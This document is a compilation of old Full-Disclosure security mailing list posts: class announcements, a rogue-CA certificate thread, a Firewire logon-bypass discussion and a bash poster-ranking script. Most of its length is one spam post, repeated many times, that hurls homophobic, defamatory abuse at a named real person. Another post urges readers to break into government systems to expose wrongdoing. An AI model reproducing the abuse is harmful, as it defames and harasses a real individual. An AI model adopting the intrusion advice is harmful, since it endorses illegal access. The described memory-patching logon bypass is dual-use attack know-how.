[Full-disclosure] OpenSecurityTraining Intel VT-x class
We're now mirroring the content for David Weinstein's x86 virtualization training class. This class teaches how to write a toy virtual machine monitor (VMM) while showing how the famous BluePill and Vitriol attacks are possible. The class is designed with particular focus on a Windows 7 x64 system, but towards the end it discusses creating a container for real-mode (BIOS code) execution inside a toy Linux VMM (accessible via /dev/vmm once the kernel module is loaded). The concepts are introduced first with some historical perspective and fundamentals, followed by doing a deep technical dive, and finally talking about detection techniques/countermeasures in the last part. http://OpenSecurityTraining.info/AdvancedX86-VTX.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenSecurityTraining Exploits 2 class
We have just released the class materials and first day of videos from Corey K's three-day Exploits 2 class. This class focuses on Windows and its exploit mitigations, whereas the previous Exploits 1 class focused on Linux. http://OpenSecurityTraining.info/Exploits2.html We also offer classes on x86 assembly and the PE binary format for those who do not already have backgrounds in those areas. http://OpenSecurityTraining.info/Training.html The OST Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Mystery of the Duqu Framework
http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework Haven't seen this (or much discussion around this) here yet, so I figured I'd share. -- -Joe. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling
Was wondering what FD's opinions were on fusion centers. www.aclu.org/fusion They are essentially COINTELPRO survellience techniques employed by the FBI-State-Local police to gather intelligence on people. And yeah, you guys fall into the scope. I was wondering what your opinions were on this government surveillance stuff. Do you have local police (turned domestic intelligence agents) have the sophistication and complexity to understand what you do? Or do you think you'll end up like Ricardo Calixte, and get raided for using Linux. http://www.eff.org/deeplinks/2009/04/boston-college- prompt-commands-are-suspicious I was wondering what you thought abuse of power by the government. And how to stop it. I think that cryptome and wikileaks is the way to go. If you see the government doing something illegal, do you have the right to break into their system and uncover the evidence? Google plain sight rule. Sure, if it's not that you'll probably go to jail, but if you hit the gold mine of their corruption, you're set. Freedom of information? COINTELPRO was owned by citizen's investigation into the FBI. It was illegal to search the FBI office. However, it offered a sweeping change in legislative policy after, since the evidence could be shown in congress. Where are all the upset feds? Blow the whistle. You can get your info out 100% safe, Get TOR (http://www.torproject.org/). Post your stories on this list, Wikileaks or Cryptome. This post was sponsored heavily by n3td3v intelligence ~~ n3td3v is not antisec. the metasploit method is ineffective. ~~ you need to get the intelligence feed at www.twitter.com/n3td3v. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Full Disclosure Top List
The top list of people posting to fd (allthough people like n3td3v have several aliases and are listed several times). .. | Top List For: January_2009 | +.--.+ | nr. | posts. | user. | ++--++ | 1 | 88 | n3td3v,andrew.wallace,sexyazngrl69 | 2 | 41 | Ureleet | | 3 | 39 | Avraham_Schneider | | 4 | 34 | j-f_sentier | | 5 | 19 | Valdis.Kletnieks_at_vt.edu| | 6 | 17 | Biz_Marqee| | 7 | 14 | Paul_Schmehl | | 8 | 11 | Mainbox_Notif | | 9 | 11 | James_Matthews| | 10| 10 | Ed_Carp | ''--'' .. | Top List For: December_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 78 | Ureleet | | 2 | 76 | n3td3v| | 3 | 26 | Valdis.Kletnieks_at_vt.edu| | 4 | 25 | James_Matthews| | 5 | 22 | j-f_sentier | | 6 | 17 | Elazar_Broad | | 7 | 15 | Bipin_Gautam | | 8 | 12 | zdi-disclosures_at_3com.com | | 9 | 12 | security_at_mandriva.com | | 10| 12 | Mike_C| ''--'' .. | Top List For: November_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 112 | n3td3v| | 2 | 61 | Ureleet | | 3 | 35 | Valdis.Kletnieks_at_vt.edu| | 4 | 30 | adrian.lamo_at_hushmail.com | | 5 | 22 | James_Matthews| | 6 | 21 | Trollie_Fingers | | 7 | 18 | Mike_C| | 8 | 15 | vulcanius | | 9 | 15 | security_at_mandriva.com | | 10| 14 | Fredrick_Diggle | ''--'' I believe that n3td3v is trying to destroy this list so that his history here somehow magically dissapears, this will not happen ofcourse because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity. ## In case someone else wants to use this script: ## #!/bin/bash LIST_SIZE=13 function _get() { MONTH=$2.txt; URL=$1; wget $URL -O $MONTH 1/dev/null 2/dev/null; #ignore if name contains quotations etc. echo..; echo -n | Top List For: $2 let S=37-$(echo $2 | wc -c); for space in $(seq 0 $S); do echo -n ; done echo|; echo+.--.+; echo| nr. | posts. | user. |; echo++--++; PRE=$(cat $MONTH | grep | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c | sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g' -e 's/ /y/g'); COUNT=1; for CURRENT in $(echo $PRE); do declare -a ITEMS=($(echo $CURRENT | sed 's/y/ /g')); # format nr col echo -n | $COUNT; let S=6-$(echo $COUNT | wc -c); for space in $(seq 0 $S); do echo -n ; done # format posts. col. echo -n | ${ITEMS[0]}; let S=8-$(echo ${ITEMS[0]} | wc -c); for space in $(seq 0 $S); do echo -n ; done echo -n |; # format user col. echo -n ${ITEMS[1]}; if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g'); fi let S=28-$(echo ${ITEMS[1]} | wc -c); for space in $(seq 0 $S); do echo -n ; done echo |; let COUNT=$COUNT+1; done echo ''--''; } _get http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html; January_2009 echo; echo; _get
Re: [Full-disclosure] Creating a rogue CA certificate
-Original Message- From: full-disclosure-boun...@lists.grok.org.uk [*mailto:full-disclosure-boun...@lists.grok.org.uk*full-disclosure-boun...@lists.grok.org.uk] On Behalf Of j...@slave-tothe-box.net Sent: Tuesday, December 30, 2008 3:17 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Creating a rogue CA certificate -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SSL/PKI is only as strong as the weakest CA... For those of you who haven't been following this, here you go: *http://www.win.tue.nl/hashclash/rogue-ca/*http://www.win.tue.nl/hashclash/rogue-ca/ *http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt*http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt Enjoy and Happy New Years! elazar -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at *https://www.hushtools.com/verify* https://www.hushtools.com/verify wpwEAQECAAYFAklaVFQACgkQi04xwClgpZh4TQP+ODe2/jTHhOrLbKtoSJhZInX+lJXt LMkU/xlYK1Au/f1E5KhXt43uMWYSeC/M0njQRPLyrDfihFlLsmAxGK/97kRQfxEttbcN R0q1BL+WmbiGNglujzSWHqMSkn20r12itVfGP77nEbGYbjidV1BXxFNR2QQwLHZhGLWe gVO/5Zg= =+Pm+ -END PGP SIGNATURE- -- Click for free info on getting an MBA, $200K/ year potential. *http://tagline.hushmail.com/fc/PnY6qxsZwUN6299xt0fJO8HvJUKovV4hcZ7MH3I*http://tagline.hushmail.com/fc/PnY6qxsZwUN6299xt0fJO8HvJUKovV4hcZ7MH3I 6KbhlC0IDsYiG8/ ___ Full-Disclosure - We believe in it. Charter: *http://lists.grok.org.uk/full-disclosure-charter.html*http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - *http://secunia.com/*http://secunia.com/ From Microsoft: *http://www.microsoft.com/technet/security/advisory/961509.mspx*http://www.microsoft.com/technet/security/advisory/961509.mspx Microsoft is not aware of specific attacks against MD5, so previously issued certificates that were signed using MD5 are not affected and do not need to be revoked. This issue only affects certificates being signed using MD5 after the publication of the attack method. I take it the above is incorrect? James ___ Full-Disclosure - We believe in it. Charter: *http://lists.grok.org.uk/full-disclosure-charter.html*http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - *http://secunia.com/*http://secunia.com/ No it is correct because the attack creates a new CA from the compromised cert which is then used to sign certs, it doesn't involve copying the signatures of certs that already have been signed by legit CAs with the exception of the one that is used to create the rogue CA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firewire Attack on Windows Vista
How much should the average user worry about this? Not very much. Most notebooks from average users don't even have Firewire on them and you would have an easier time cracking them with a dictionary attack on the password and other such things, which means that this attack makes you no more vulnerable to compromise if you've already granted physical access than you were before. you don't need a firewire port on your laptop, a pcmcia slot is enough where an attacker inserts a firewire card. but still.. it's a physical access attack.. regarding your other email: OK, I guess I misunderstood the original paper (http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks .pdf). It now looks to me like they are claiming they can disable password authentication *even while the system is not logged on* - do I have that right? yes, if the system is off and you can turn it on (e.g. no bios or hdd encryption passwords) you can bypass the logon screen. this is because the tool searches for the function MsvpPasswordValidate in memory and patches it to allow any password. FD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [EMAIL PROTECTED] likes spam (but does spam like [EMAIL PROTECTED])
It's true. I like spam. And one of the best ways to get spam is to post to a public security list which is mirrored all over the place (at least in my experience ;)). That's why myself and [EMAIL PROTECTED] are teaming up to get great gobs of spam. It's all in the interest of tracking bots of course...just need to cast a wide net :) Aaron p.s. a href=mailto:[EMAIL PROTECTED][EMAIL PROTECTED]/a a href=mailto:[EMAIL PROTECTED][EMAIL PROTECTED]/a ;) p.p.s. n3td3v was doing the same thing, I'm just lazier than her ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SinFP OS fingerprinting online demo
Sorry, I forgot to mention that a benchmark versus Nmap has been done by someone on his blog: http://www.computerdefense.org/?p=173 -- ^ ___ ___ http://www.GomoR.org/ -+ | / __ |__/ Systems Security Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]---| +-- Net::Frame = http://search.cpan.org/~gomor/ ---+ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I LOVE TO SPAM - SPAM ME AT [EMAIL PROTECTED]
SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk SPAM ME AT [EMAIL PROTECTED] BY SPOOFING MAIL FROM full-disclosure@lists.grok.org.uk Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by 